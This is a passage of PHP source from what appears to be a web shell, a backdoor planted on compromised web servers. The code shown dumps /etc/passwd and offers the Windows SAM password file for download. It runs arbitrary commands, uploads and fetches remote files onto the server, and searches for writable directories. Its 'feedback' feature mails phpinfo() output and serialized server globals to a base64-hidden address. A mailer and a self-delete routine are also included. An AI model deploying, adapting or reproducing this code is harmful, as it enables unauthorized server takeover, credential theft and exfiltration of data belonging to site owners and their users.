1167 <input type="submit" value="View">
1168 </form><br>
1169<?php
1170 $i = $nixpwd_s;
1171 while ($i < $nixpwd_e) {
1172 $uid = posix_getpwuid($i);
1173 if ($uid) {
1174 $uid["dir"] = "<a href=\"".$surl."act=ls&d=".urlencode($uid["dir"])."\">".$uid["dir"]."</a>";
1175 echo "\t\t".join(":",$uid)."<br>\n";
1176 }
1177 $i++;
1178 }
1179 }
1180 else { echo "\t<a href=\"".$surl."act=security&nixpasswd=1&d=".$ud."\"><b>View /etc/passwd</b></a>\n"; }
1181 }
1182 else {
1183 $v = $_SERVER["WINDIR"].'\repair\sam';
1184 if (file_get_contents($v)) {
1185 echo "\t<a href=\"".$surl."act=f&f=sam&d=".$_SERVER["WINDIR"]."\\repair&ft=download\"><b>Download password file</b></a>\n";
1186 }
1187 }
1188?>
1189 </td></tr>
1190 <tr><td>Config Files</td><td>
1191<?php
1192 if (!is_windows()) {
1193 $v = array(
1194 array("User Domains","/etc/userdomains"),
1195 array("Cpanel Config","/var/cpanel/accounting.log"),
1196 array("Apache Config","/usr/local/apache/conf/httpd.conf"),
1197 array("Apache Config","/etc/httpd.conf"),
1198 array("Syslog Config","/etc/syslog.conf"),
1199 array("Message of The Day","/etc/motd"),
1200 array("Hosts","/etc/hosts")
1201 );
1202 $sep = "/";
1203 }
1204 else {
1205 $windir = $_SERVER["WINDIR"];
1206 $etcdir = $windir.'\system32\drivers\etc\\';
1207 $v = array(
1208 array("Hosts",$etcdir."hosts"),
1209 array("Local Network Map",$etcdir."networks"),
1210 array("LM Hosts",$etcdir."lmhosts.sam"),
1211 );
1212 $sep = "\\";
1213 }
1214 foreach ($v as $sec_arr) {
1215 $sec_f = substr(strrchr($sec_arr[1], $sep), 1);
1216 $sec_d = rtrim($sec_arr[1],$sec_f);
1217 $sec_full = $sec_d.$sec_f;
1218 $sec_d = rtrim($sec_d,$sep);
1219 if (file_get_contents($sec_full)) {
1220 echo "\t[ <a href=\"".$surl."act=f&f=$sec_f&d=".urlencode($sec_d)."&ft=txt\"><b>".$sec_arr[0]."</b></a> ]\n";
1221 }
1222 }
1223?>
1224 </td></tr>
1225<?php
1226 function dispsecinfo($name,$value) {
1227 if (!empty($value)) {
1228 echo "\t<tr><td>".$name."</td><td>\n".
1229 "<pre>".wordwrap($value,100)."</pre>\n".
1230 "\t</td></tr>\n";
1231 }
1232 }
1233
1234 if (!is_windows()) {
1235 dispsecinfo("OS Version",fx29exec("cat /proc/version"));
1236 dispsecinfo("Kernel Version",fx29exec("sysctl -a | grep version"));
1237 dispsecinfo("Distrib Name",fx29exec("cat /etc/issue.net"));
1238 dispsecinfo("Distrib Name (2)",fx29exec("cat /etc/*-realise"));
1239 dispsecinfo("CPU Info",fx29exec("cat /proc/cpuinfo"));
1240 dispsecinfo("RAM",fx29exec("free -m"));
1241 dispsecinfo("HDD Space",fx29exec("df -h"));
1242 dispsecinfo("List of Attributes",fx29exec("lsattr -a"));
1243 dispsecinfo("Mount Options",fx29exec("cat /etc/fstab"));
1244 dispsecinfo("lynx installed?",fx29exec("which lynx"));
1245 dispsecinfo("links installed?",fx29exec("which links"));
1246 dispsecinfo("GET installed?",fx29exec("which GET"));
1247 dispsecinfo("Where is Apache?",fx29exec("whereis apache"));
1248 dispsecinfo("Where is perl?",fx29exec("whereis perl"));
1249 dispsecinfo("Locate proftpd.conf",fx29exec("locate proftpd.conf"));
1250 dispsecinfo("Locate httpd.conf",fx29exec("locate httpd.conf"));
1251 dispsecinfo("Locate my.conf",fx29exec("locate my.conf"));
1252 dispsecinfo("Locate psybnc.conf",fx29exec("locate psybnc.conf"));
1253 }
1254 else {
1255 dispsecinfo("OS Version",fx29exec("ver"));
1256 dispsecinfo("Account Settings",fx29exec("net accounts"));
1257 dispsecinfo("User Accounts",fx29exec("net user"));
1258 }
1259 echo "</table>\n";
1260 }
1261
1262 ##[ MAKE FILE ]##
1263 if ($act == "mkfile") {
1264 if ($mkfile != $d) {
1265 if ($overwrite == 0) {
1266 if (file_exists($mkfile)) { echo "<b>FILE EXIST:</b> $overwrite ".htmlspecialchars($mkfile); }
1267 }
1268 else {
1269 if (!fopen($mkfile,"w")) { echo "<b>ACCESS DENIED:</b> ".htmlspecialchars($mkfile); }
1270 else { $act = "f"; $d = dirname($mkfile); if (substr($d,-1) != DIRECTORY_SEPARATOR) {
1271 $d .= DIRECTORY_SEPARATOR;
1272 }
1273 $f = basename($mkfile);
1274 }
1275 }
1276 }
1277 else { disp_error("Enter filename!"); }
1278 }
1279
1280 ##[ ENCODER ]##
1281 if ($act == "encoder") {
1282 if (!isset($encoder_input)) { $encoder_input = ""; }
1283?>
1284<script language="javascript"> function set_encoder_input(text) { document.forms.encoder.input.value = text; }</script>
1285
1286<form name="encoder" action="<?php echo $surl; ?>" method=POST>
1287 <input type="hidden" name="act" value="encoder">
1288 <table class="contents">
1289 <tr><td colspan="4" class="barheader">.: Encoder :.</td></tr>
1290 <tr><td colspan="2">Input:</td><td><textarea name="encoder_input" id="input" cols="70" rows="5"><?php echo @htmlspecialchars($encoder_input); ?></textarea><br>
1291 <input type="submit" value="Calculate">
1292 </td></tr>
1293 <tr><td rowspan="4">Hashes:</td>
1294<?php
1295 foreach(array("md5","crypt","sha1","crc32") as $v) {
1296?>
1297 <td><?php echo $v; ?>:</td><td><input type="text" size="50" onFocus="this.select()" onMouseover="this.select()" onMouseout="this.select()" value="<?php echo $v($encoder_input); ?>" readonly>
1298 </td></tr>
1299 <tr>
1300<?php
1301 }
1302?>
1303 </tr>
1304 <tr><td rowspan=2>Url:</td>
1305 <td>urlencode:</td><td><input type="text" size="35" onFocus="this.select()" onMouseover="this.select()" onMouseout="this.select()" value="<?php echo urlencode($encoder_input); ?>" readonly>
1306 </td></tr>
1307 <tr><td>urldecode:</td><td><input type="text" size="35" onFocus="this.select()" onMouseover="this.select()" onMouseout="this.select()" value="<?php echo htmlspecialchars(urldecode($encoder_input)); ?>" readonly>
1308 </td></tr>
1309 <tr><td rowspan=2>Base64:</td>
1310 <td>base64_encode:</td><td><input type="text" size="35" onFocus="this.select()" onMouseover="this.select()" onMouseout="this.select()" value="<?php echo base64_encode($encoder_input); ?>" readonly>
1311 </td></tr>
1312 <tr><td>base64_decode:</td>
1313 <td>
1314<?php
1315 if (base64_encode(base64_decode($encoder_input)) != $encoder_input) {
1316?>
1317 <input type="text" size="35" value="Failed!" disabled readonly>
1318<?php
1319 }
1320 else {
1321 $debase64 = base64_decode($encoder_input);
1322 $debase64 = str_replace("\0","[0]",$debase64);
1323 $a = explode("\r\n",$debase64);
1324 $rows = count($a);
1325 $debase64 = htmlspecialchars($debase64);
1326 if ($rows == 1) {
1327 echo "\t\t<input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".$debase64."\" id=\"debase64\" readonly>";
1328 }
1329 else {
1330 $rows++;
1331 echo "<textarea cols=\"40\" rows=\"".$rows."\" onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" id=\"debase64\" readonly>".$debase64."</textarea>";
1332 }
1333 echo " <a href=\"#\" onclick=\"set_encoder_input(document.forms.encoder.debase64.value)\">[Send to input]</a>\n";
1334 }
1335 echo "\t\t</td></tr>\n".
1336 "\t\t<tr><td>Base convertations:</td><td>dec2hex</td><td>".
1337 "<input type=\"text\" size=\"35\" onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"\"";
1338 $c = strlen($encoder_input);
1339 for ($i=0;$i<$c;$i++) {
1340 $hex = dechex(ord($encoder_input[$i]));
1341 if ($encoder_input[$i] == "&") { echo $encoder_input[$i]; }
1342 elseif ($encoder_input[$i] != "\\") { echo "%".$hex; }
1343 }
1344 echo "\" readonly>\n";
1345?>
1346 </td></tr>
1347 </table>
1348</form>
1349<?php
1350 }
1351
1352 ##[ FILESYSTEM BUFFER ]##
1353 if ($act == "fsbuff") {
1354 $arr_copy = $sess_data["copy"];
1355 $arr_cut = $sess_data["cut"];
1356 $arr = array_merge($arr_copy,$arr_cut);
1357 if (count($arr) == 0) {echo "<h2><center>Buffer is empty!</center></h2>";}
1358 else {
1359 $fx_infohead = "File-System Buffer";
1360 $ls_arr = $arr;
1361 $disp_fullpath = TRUE;
1362 $act = "ls";
1363 }
1364 }
1365
1366 ##[ SELF REMOVE ]##
1367 if ($act == "selfremove") {
1368?>
1369<div class="barheader">
1370 .: SELF KILL :.
1371 <hr size="1" noshade>
1372
1373<?php
1374 if ((@$submit == @$rndcode) && (@$submit != "")) {
1375 if (unlink(__FILE__)) { @ob_clean(); echo "Thanks for using ".sh_name()."!"; fx29shexit(); }
1376 else { disp_error("Can't delete ".__FILE__."!"); }
1377 }
1378 else {
1379 if (!empty($rndcode)) { disp_error("Error: Incorrect confirmation code!"); }
1380 $rnd = rand(0,9).rand(0,9).rand(0,9);
1381?>
1382<form name="f_killshell" action="<?php echo $surl; ?>">
1383 <input type="hidden" name="act" value="selfremove">
1384 <input type="hidden" name="rndcode" value="<?php echo $rnd; ?>">
1385 Are you sure want to remove this shell ?<br>
1386 <?php disp_error(__FILE__); ?>
1387 <br>For confirmation, enter "<?php echo $rnd; ?>"<br>
1388 <input type="text" name="submit"><br>
1389 <input type="submit" value="KILL">
1390</form>
1391</div>
1392<?php
1393 }
1394 }
1395
1396 ##[ FEEDBACK ]##
1397 if ($act == "feedback") {
1398 $suppmail = base64_decode("ZmVlbGNvbXpAZ21haWwuY29t");
1399 if (!empty($submit)) {
1400 $ticket = substr(md5(microtime()+rand(1,1000)),0,6);
1401 $body = sh_name()." feedback #".$ticket."\nName: ".htmlspecialchars($fdbk_name)."\nE-mail: ".htmlspecialchars($fdbk_email)."\nMessage:\n".htmlspecialchars($fdbk_body)."\n\nIP: ".$REMOTE_ADDR;
1402 if (!empty($fdbk_ref)) {
1403 $tmp = @ob_get_contents();
1404 ob_clean();
1405 phpinfo();
1406 $phpinfo = base64_encode(ob_get_contents());
1407 ob_clean();
1408 echo $tmp;
1409 $body .= "\n"."phpinfo(): ".$phpinfo."\n"."\$GLOBALS=".base64_encode(serialize($GLOBALS))."\n";
1410 }
1411 mail($suppmail,sh_name()." feedback #".$ticket,$body,"FROM: ".$suppmail);
1412 echo "<center><b>Thanks for your feedback! Your ticket ID: ".$ticket.".</b></center>";
1413 }
1414 else {
1415?>
1416<div class="barheader">.: Feedback or report bug (<?php echo str_replace(array("@","."),array("[at]","[dot]"),$suppmail); ?>) :.</div>
1417
1418<form name="f_feedback" action="<?php echo $surl; ?>" method="POST">
1419 <input type="hidden" name="act" value="feedback">
1420 <table class="contents">
1421 <tr><th>Your name:</th><td><input type="text" name="fdbk_name" value="<?php echo htmlspecialchars(@$fdbk_name); ?>"></td</tr>
1422 <tr><th>Your e-mail:</th><td><input type="text" name="fdbk_email" value="<?php echo htmlspecialchars(@$fdbk_email); ?>"></td></tr>
1423 <tr><th>Message:</th><td><textarea name="fdbk_body" cols=80 rows=10><?php echo htmlspecialchars(@$fdbk_body); ?></textarea>
1424 <input type="hidden" name="fdbk_ref" value="<?php echo urlencode($HTTP_REFERER); ?>"><br>
1425 <input type="checkbox" name="fdbk_servinf" value="1" checked> Attach Server info (Recommended for bug-fix)</td></tr>
1426 <tr><td></td><td><input type="submit" name="submit" value="Send"></td></tr>
1427 </table>
1428</form>
1429<?php
1430 }
1431 }
1432
1433 ##[ PHP MAILER (By FaTaLisTiCz_Fx) ]##
1434 if ($act == "fxmailer") {
1435?>
1436 <div class="barheader">.: Mailer :.</div>
1437<?php
1438 if (!empty($submit)){
1439 $headers = 'To: '.$dest_email."\n";
1440 $headers .= 'From: '.$sender_name.' '.$sender_email."\n";
1441 if (mail($dest_email,$sender_subj,$sender_body,$headers)) {
1442 echo "<center><b>Email sent to $dest_email!</b></center>";
1443 }
1444 else { disp_error("Can't send email!"); }
1445 }
1446 else {
1447 ?>
1448<form name="f_mailer" action="<?php echo $surl; ?>" method="POST">
1449 <input type="hidden" name="act" value="fxmailer">
1450 <table class="contents">
1451 <tr><th>Your name:</th><td><input type="text" name="sender_name" value="<?php echo @htmlspecialchars($sender_name); ?>"></td></tr>
1452 <tr><th>Your e-mail:</th><td><input type="text" name="sender_email" value="<?php echo @htmlspecialchars($sender_email); ?>"></td></tr>
1453 <tr><th>To:</th><td><input type="text" name="dest_email" value="<?php @htmlspecialchars($dest_email); ?>"></td></tr>
1454 <tr><th>Subject:</th><td><input size="70" type="text" name="sender_subj" value="<?php echo @htmlspecialchars($sender_subj); ?>"></td></tr>
1455 <tr><th>Message:</th><td><textarea name="sender_body" cols="80" rows="10"><?php echo @htmlspecialchars($sender_body); ?></textarea></td></tr>
1456 <tr><th></th><td><input type="submit" name="submit" value="Send"></td></tr>
1457 </table>
1458</form>
1459<?php
1460 }
1461 }
1462
1463 ##[ SEARCH ]##
1464 if ($act == "search") {
1465?>
1466<div class=barheader>.: Filesystem Search :.</div>
1467
1468<?php
1469 if (empty($search_in)) {$search_in = $d;}
1470 if (empty($search_name)) {$search_name = "(.*)"; $search_name_regexp = 1;}
1471 if (empty($search_text_wwo)) {$search_text_regexp = 0;}
1472 if (!empty($submit)) {
1473 $found = array();
1474 $found_d = 0;
1475 $found_f = 0;
1476 $search_i_f = 0;
1477 $search_i_d = 0;
1478 $a = array(
1479 "name" => @$search_name,
1480 "name_regexp" => @$search_name_regexp,
1481 "text" => @$search_text,
1482 "text_regexp" => @$search_text_regxp,
1483 "text_wwo" => @$search_text_wwo,
1484 "text_cs" => @$search_text_cs,
1485 "text_not" => @$search_text_not
1486 );
1487 $searchtime = getmicrotime();
1488 $in = array_unique(explode(";",$search_in));
1489 foreach($in as $v) { fx29fsearch($v); }
1490 $searchtime = round(getmicrotime()-$searchtime,4);
1491 if (count($found) == 0) { echo "No files found!"; }
1492 else {
1493 $ls_arr = $found;
1494 $disp_fullpath = TRUE;
1495 $act = "ls";
1496 }
1497 }
1498?>
1499<form name="f_search" method="POST">
1500 <input type="hidden" name="d" value="<?php echo $dispd; ?>">
1501 <input type="hidden" name="act" value="<?php echo $dspact; ?>">
1502 <table class="contents">
1503 <tr><th>File or folder Name:</th><td><input type="text" name="search_name" size="<?php echo round(strlen($search_name)+25); ?>" value="<?php echo htmlspecialchars($search_name); ?>"> <input type="checkbox" name="search_name_regexp" value="1" <?php echo (@$search_name_regexp == 1?" checked":""); ?>> Regular Expression</td></tr>
1504 <tr><th>Look in (Separate by ";"):</th><td><input type="text" name="search_in" size="<?php echo round(strlen($search_in)+25); ?>" value="<?php echo htmlspecialchars($search_in); ?>"></td></tr>
1505 <tr><th>A word or phrase in the file:</th><td><textarea name="search_text" cols="50" rows="5"><?php echo htmlspecialchars(@$search_text); ?></textarea></td></tr>
1506 <tr><th></th><td>
1507 <input type="checkbox" name="search_text_regexp" value="1" <?php echo (@$search_text_regexp == 1?" checked":""); ?>> Regular Expression
1508 <input type="checkbox" name="search_text_wwo" value="1" <?php echo (@$search_text_wwo == 1?" checked":""); ?>> Whole words only
1509 <input type="checkbox" name="search_text_cs" value="1" <?php echo (@$search_text_cs == 1?" checked":""); ?>> Case sensitive
1510 <input type="checkbox" name="search_text_not" value="1" <?php echo (@$search_text_not == 1?" checked":""); ?>> Find files NOT containing the text
1511 </td></tr>
1512 <tr><th></th><td><input type="submit" name="submit" value="Search"></td></tr>
1513 </table>
1514</form>
1515<?php
1516 if ($act == "ls") {
1517 $dspact = $act;
1518 echo $searchtime." secs (".$search_i_f." files and ".$search_i_d." folders, ".round(($search_i_f+$search_i_d)/$searchtime,4)." objects per second).</b>\n".
1519 "<hr size=\"1\" noshade>\n";
1520 }
1521 }
1522
1523 ##[ CHMOD]##
1524 if ($act == "chmod") {
1525 $mode = fileperms($d.$f);
1526 if (!$mode) {echo "<b>Change file-mode with error:</b> can't get current value.";}
1527 else {
1528 $form = TRUE;
1529 if ($chmod_submit) {
1530 $octet = "0".base_convert(($chmod_o["r"]?1:0).($chmod_o["w"]?1:0).($chmod_o["x"]?1:0).($chmod_g["r"]?1:0).($chmod_g["w"]?1:0).($chmod_g["x"]?1:0).($chmod_w["r"]?1:0).($chmod_w["w"]?1:0).($chmod_w["x"]?1:0),2,8);
1531 if (chmod($d.$f,$octet)) { $act = "ls"; $form = FALSE; $err = ""; }
1532 else {$err = "Can't chmod to ".$octet.".";}
1533 }
1534 if ($form) {
1535 $perms = parse_perms($mode);
1536 echo "<b>Changing file-mode (".$d.$f."), ".view_perms_color($d.$f)." (".substr(decoct(fileperms($d.$f)),-4,4).")</b>\n".
1537 "<br>".($err?"<b>Error:</b> ".$err:"")."\n".
1538 "<form name=\"f_chmod\" action=\"".$surl."\" method=POST>\n".
1539 "<input type=hidden name=d value=\"".htmlspecialchars($d)."\">\n".
1540 "<input type=hidden name=f value=\"".htmlspecialchars($f)."\">\n".
1541 "<input type=hidden name=act value=chmod>\n".
1542 "<table><tr>\n".
1543 "<td><b>Owner</b><br><br>\n".
1544 "<input type=checkbox NAME=chmod_o[r] value=1".($perms["o"]["r"]?" checked":"")."> Read<br>\n".
1545 "<input type=checkbox name=chmod_o[w] value=1".($perms["o"]["w"]?" checked":"")."> Write<br>\n".
1546 "<input type=checkbox NAME=chmod_o[x] value=1".($perms["o"]["x"]?" checked":"")."> eXecute</td>\n".
1547 "<td><b>Group</b><br><br>\n".
1548 "<input type=checkbox NAME=chmod_g[r] value=1".($perms["g"]["r"]?" checked":"")."> Read<br>\n".
1549 "<input type=checkbox NAME=chmod_g[w] value=1".($perms["g"]["w"]?" checked":"")."> Write<br>\n".
1550 "<input type=checkbox NAME=chmod_g[x] value=1".($perms["g"]["x"]?" checked":"")."> eXecute</td>\n".
1551 "<td><b>World</b><br><br>\n".
1552 "<input type=checkbox NAME=chmod_w[r] value=1".($perms["w"]["r"]?" checked":"")."> Read<br>\n".
1553 "<input type=checkbox NAME=chmod_w[w] value=1".($perms["w"]["w"]?" checked":"")."> Write<br>\n".
1554 "<input type=checkbox NAME=chmod_w[x] value=1".($perms["w"]["x"]?" checked":"")."> eXecute</td>\n".
1555 "</tr>\n".
1556 "<tr><td><input type=submit name=chmod_submit value=\"Save\"></td></tr>\n".
1557 "</table>\n".
1558 "</form>\n";
1559 }
1560 }
1561 }
1562
1563 ##[ UPLOAD ]##
1564 if ($act == "upload") {
1565 $uploadmess = "";
1566 $uploadpath = (isset($uploadpath)) ? str_replace("\\",DIRECTORY_SEPARATOR,$uploadpath) : $d;
1567 if (substr($uploadpath,-1) != DIRECTORY_SEPARATOR) { $uploadpath .= DIRECTORY_SEPARATOR; }
1568 if (!empty($submit)) {
1569 $uploadfile = $_FILES["uploadfile"];
1570 if (!empty($uploadfile["tmp_name"])) {
1571 if (empty($uploadfilename)) { $destin = $uploadfile["name"]; }
1572 else { $destin = $userfilename; }
1573 if (!move_uploaded_file($uploadfile["tmp_name"],$uploadpath.$destin)) {
1574 $uploadmess .= "<div class=errmsg>Error uploading file ".$uploadfile["name"]." (Can't copy \"".$uploadfile["tmp_name"]."\" to \"".$uploadpath.$destin."\"!</div>";
1575 }
1576 else { $uploadmess .= "File uploaded successfully!<br>".$uploadpath.$destin; }
1577 }
1578 else { $uploadmess .= "<div class=errmsg>No file to upload!</div>"; }
1579 }
1580 echo $uploadmess;
1581 $act = "ls";
1582 }
1583
1584 ##{ DELETE }##
1585 if ($act == "delete") {
1586 $delerr = "";
1587 foreach ($actbox as $v) {
1588 $result = FALSE;
1589 $result = fs_rmobj($v);
1590 if (!$result) { $delerr .= "Can't delete ".htmlspecialchars($v)."<br>"; }
1591 }
1592 if (!empty($delerr)) { disp_error("Error deleting:<br>$delerr"); }
1593 $act = "ls";
1594 }
1595
1596 ##[ COPY ]##
1597 if ($act == "copy") {
1598 $err = "";
1599 $sess_data["copy"] = array_merge($sess_data["copy"],$actbox);
1600 fx29_sess_put($sess_data);
1601 $act = "ls";
1602 }
1603
1604 ##[ CUT ]##
1605 elseif ($act == "cut") {
1606 $sess_data["cut"] = array_merge($sess_data["cut"],$actbox);
1607 fx29_sess_put($sess_data);
1608 $act = "ls";
1609 }
1610
1611 ##[ UNSELECT ]##
1612 elseif ($act == "unselect") {
1613 foreach ($sess_data["copy"] as $k=>$v) {
1614 if (in_array($v,$actbox)) { unset($sess_data["copy"][$k]); }
1615 }
1616 foreach ($sess_data["cut"] as $k=>$v) {
1617 if (in_array($v,$actbox)) { unset($sess_data["cut"][$k]); }
1618 }
1619 fx29_sess_put($sess_data);
1620 $act = "ls";
1621 }
1622
1623 ##[ EMPTY BUFFER ]##
1624 if (@$actemptybuff) { $sess_data["copy"] = $sess_data["cut"] = array(); fx29_sess_put($sess_data); }
1625
1626 ##[ PASTE BUFFER ]##
1627 elseif (@$actpastebuff) {
1628 $psterr = "";
1629 foreach($sess_data["copy"] as $k=>$v) {
1630 $to = $d.basename($v);
1631 if (!fs_copy_obj($v,$to)) { $psterr .= "Can't copy ".$v." to ".$to."!<br>"; }
1632 if ($copy_unset) { unset($sess_data["copy"][$k]); }
1633 }
1634 foreach($sess_data["cut"] as $k=>$v) {
1635 $to = $d.basename($v);
1636 if (!fs_move_obj($v,$to)) { $psterr .= "Can't move ".$v." to ".$to."!<br>"; }
1637 unset($sess_data["cut"][$k]);
1638 }
1639 fx29_sess_put($sess_data);
1640 if (!empty($psterr)) { disp_error("Pasting with errors:<br>$psterr"); }
1641 $act = "ls";
1642 }
1643
1644 ##[ ARCHIVE BUFFER ]##
1645 elseif (@$actarcbuff) {
1646 $arcerr = "";
1647 if (substr($actarcbuff_path,-7,7) == ".tar.gz") { $ext = ".tar.gz"; }
1648 else { $ext = ".tar.gz"; }
1649 if ($ext == ".tar.gz") { $cmdline = "tar cfzv"; }
1650 $cmdline .= " ".$actarcbuff_path;
1651 $objects = array_merge($sess_data["copy"],$sess_data["cut"]);
1652 foreach($objects as $v) {
1653 $v = str_replace("\\",DIRECTORY_SEPARATOR,$v);
1654 if (substr($v,0,strlen($d)) == $d) { $v = basename($v); }
1655 if (is_dir($v)) {
1656 if (substr($v,-1) != DIRECTORY_SEPARATOR) {$v .= DIRECTORY_SEPARATOR;}
1657 $v .= "*";
1658 }
1659 $cmdline .= " ".$v;
1660 }
1661 $tmp = realpath(".");
1662 chdir($d);
1663 $ret = fx29exec($cmdline);
1664 chdir($tmp);
1665 if (empty($ret)) { $arcerr .= "Can't call archivator (".htmlspecialchars(str2mini($cmdline,60)).")!<br>"; }
1666 $ret = str_replace("\r\n","\n",$ret);
1667 $ret = explode("\n",$ret);
1668 if ($copy_unset) { foreach($sess_data["copy"] as $k=>$v) { unset($sess_data["copy"][$k]); } }
1669 foreach($sess_data["cut"] as $k=>$v) {
1670 if (in_array($v,$ret)) { fs_rmobj($v); }
1671 unset($sess_data["cut"][$k]);
1672 }
1673 fx29_sess_put($sess_data);
1674 if (!empty($arcerr)) { disp_error("Archivation errors:<br>$arcerr"); }
1675 $act = "ls";
1676 }
1677 ##[ CMD ]##
1678 if ($act == "cmd") {
1679 @chdir($chdir);
1680 if (!empty($submit)) {
1681 echo "<div class=barheader>.: Command Output :.</div>\n";
1682 $olddir = realpath(".");
1683 @chdir($d);
1684 $ret = fx29exec($cmd);
1685 $ret = convert_cyr_string($ret,"d","w");
1686 if ($cmd_txt) {
1687 $rows = count(explode("\n",$ret))+1;
1688 if ($rows < 10) { $rows = 10; } else { $rows = 30; }
1689 $cols = 125;
1690 echo "<textarea class=\"shell\" cols=\"$cols\" rows=\"$rows\" readonly>".htmlspecialchars($ret)."</textarea>\n";
1691 }
1692 else { echo $ret."<br>"; }
1693 @chdir($olddir);
1694 }
1695 }
1696 ##[ PHP FILESYSTEM (By FaTaLisTiCz_Fx) ]##
1697 if ($act == "phpfsys") {
1698 echo "<div align=left>";
1699 $fsfunc = $phpfsysfunc;
1700 if ($fsfunc=="copy") {
1701 if (!copy($arg1, $arg2)) { echo "Failed to copy $arg1...\n";}
1702 else { echo "<b>Success!</b> $arg1 copied to $arg2\n"; }
1703 }
1704 elseif ($fsfunc=="rename") {
1705 if (!rename($arg1, $arg2)) { echo "Failed to rename/move $arg1!\n";}
1706 else { echo "<b>Success!</b> $arg1 renamed/moved to $arg2\n"; }
1707 }
1708 elseif ($fsfunc=="chmod") {
1709 if (!chmod($arg1,$arg2)) { echo "Failed to chmod $arg1!\n";}
1710 else { echo "<b>Perm for $arg1 changed to $arg2!</b>\n"; }
1711 }
1712 elseif ($fsfunc=="read") {
1713 $darg = $d.$arg1;
1714 if ($hasil = @file_get_contents($darg)) {
1715 echo "<b>Filename:</b> ".$darg."<br>";
1716 echo "<center><textarea cols=125 rows=30>";
1717 echo htmlentities($hasil);
1718 echo "</textarea></center>\n";
1719 }
1720 else { disp_error("Couldn't open $darg"); }
1721 }
1722 elseif ($fsfunc=="write") {
1723 $darg = $d.$arg1;
1724 if(@file_put_contents($darg,$arg2)) {
1725 echo "<b>Saved!</b> ".$darg;
1726 }
1727 else { disp_error("Can't write to $darg!"); }
1728 }
1729 elseif ($fsfunc=="downloadbin") {
1730 $handle = fopen($arg1, "rb");
1731 $contents = '';
1732 while (!feof($handle)) {
1733 $contents .= fread($handle, 8192);
1734 }
1735 $r = @fopen($d.$arg2,'w');
1736 if (fwrite($r,$contents)) { echo "<b>Success!</b> $arg1 saved to ".$d.$arg2." (".view_size(filesize($d.$arg2)).")"; }
1737 else { disp_error("Can't write to ".$d.$arg2."!"); }
1738 fclose($r);
1739 fclose($handle);
1740 }
1741 elseif ($fsfunc=="download") {
1742 $text = implode('', file($arg1));
1743 if ($text) {
1744 $r = @fopen($d.$arg2,'w');
1745 if (fwrite($r,$text)) { echo "<b>Success!</b> $arg1 saved to ".$d.$arg2." (".view_size(filesize($d.$arg2)).")"; }
1746 else { disp_error("Can't write to ".$d.$arg2."!"); }
1747 fclose($r);
1748 }
1749 else { disp_error("Can't download from $arg1!");}
1750 }
1751 elseif ($fsfunc=='mkdir') {
1752 $thedir = $d.$arg1;
1753 if ($thedir != $d) {
1754 if (file_exists($thedir)) { echo "<b>Already exists:</b> ".htmlspecialchars($thedir); }
1755 elseif (!mkdir($thedir)) { echo "<b>Access denied:</b> ".htmlspecialchars($thedir); }
1756 else { echo "<b>Dir created:</b> ".htmlspecialchars($thedir);}
1757 }
1758 else { echo "Can't create current dir:<b> $thedir</b>"; }
1759 }
1760 elseif ($fsfunc=='fwritabledir') {
1761 function recurse_dir($dir,$max_dir) {
1762 global $dir_count;
1763 $dir_count++;
1764 if( $cdir = dir($dir) ) {
1765 while( $entry = $cdir-> read() ) {
1766 if( $entry != '.' && $entry != '..' ) {
1767 if(is_dir($dir.$entry) && is_writable($dir.$entry) ) {
1768 if ($dir_count > $max_dir) { return; }
1769 echo "[".$dir_count."] ".$dir.$entry."\n";
1770 recurse_dir($dir.$entry.DIRECTORY_SEPARATOR,$max_dir);
1771 }
1772 }
1773 }
1774 $cdir->close();
1775 }
1776 }
1777 if (!$arg1) { $arg1 = $d; }
1778 if (!$arg2) { $arg2 = 10; }
1779 if (is_dir($arg1)) {
1780 echo "<b>Writable directories (Max: $arg2) in:</b> $arg1<hr noshade size=1>";
1781 echo "<pre>";
1782 recurse_dir($arg1,$arg2);
1783 echo "</pre>";
1784 $total = $dir_count - 1;
1785 echo "<hr noshade size=1><b>Founds:</b> ".$total." of <b>Max</b> $arg2";
1786 }
1787 else {
1788 disp_error("Directory is not exists or permission denied!");
1789 }
1790 }
1791 else {
1792 if (!$arg1) { disp_error("No operation! Please fill 1st parameter!"); }
1793 else {
1794 if ($hasil = $fsfunc($arg1)) {
1795 echo "<b>Result of $fsfunc $arg1:</b><br>";
1796 if (!is_array($hasil)) { echo "$hasil\n"; }
1797 else {
1798 echo "<pre>";
1799 foreach ($hasil as $v) { echo $v."\n"; }
1800 echo "</pre>";
1801 }
1802 }
1803 else { disp_error("$fsfunc $arg1 failed!"); }
1804 }
1805 }
1806 echo "</div>\n";
1807 }
1808
1809 ##[ DIRECTORY LIST ]##
1810 if ($act == "ls") {
1811 if (count($ls_arr) > 0) { $list = $ls_arr; }
1812 else {
1813 $list = array();
1814 if ($h = @opendir($d)) {
1815 while (($o = readdir($h)) !== FALSE) { $list[] = $d.$o; }
1816 closedir($h);
1817 }
1818 }
1819 if (count($list) == 0) {
1820 disp_error("No such directory or access denied!<br>".htmlspecialchars($d));
1821 }
1822 else {
1823 $objects = array();
1824 $vd = "f"; #Viewing mode
1825 if ($vd == "f") {
1826 $objects["head"] = array();
1827 $objects["folders"] = array();
1828 $objects["links"] = array();
1829 $objects["files"] = array();
1830 foreach ($list as $v) {
1831 $o = basename($v);
1832 $row = array();
1833 if ($o == ".") { $row[] = $d.$o; $row[] = "CURDIR"; }
1834 elseif ($o == "..") { $row[] = $d.$o; $row[] = "DIR"; }
1835 elseif (is_dir($v)) {
1836 if (is_link($v)) { $type = "LINK"; }
1837 else { $type = "DIR"; }
1838 $row[] = $v;
1839 $row[] = $type;
1840 }
1841 elseif(is_file($v)) { $row[] = $v; $row[] = filesize($v); }
1842 $row[] = filemtime($v);
1843 if (!is_windows()) {
1844 $ow = posix_getpwuid(fileowner($v));
1845 $gr = posix_getgrgid(filegroup($v));
1846 $row[] = ($ow["name"]?$ow["name"]:fileowner($v))."/".($gr["name"]?$gr["name"]:filegroup($v));
1847 }
1848 $row[] = fileperms($v);
1849 if (($o == ".") or ($o == "..")) {$objects["head"][] = $row;}
1850 elseif (is_link($v)) { $objects["links"][] = $row; }
1851 elseif (is_dir($v)) { $objects["folders"][] = $row; }
1852 elseif (is_file($v)) { $objects["files"][] = $row; }
1853 $i++;
1854 }
1855 $row = array();
1856 $row[] = "<b>Name</b>";
1857 $row[] = "<b>Size</b>";
1858 $row[] = "<b>Date Modified</b>";
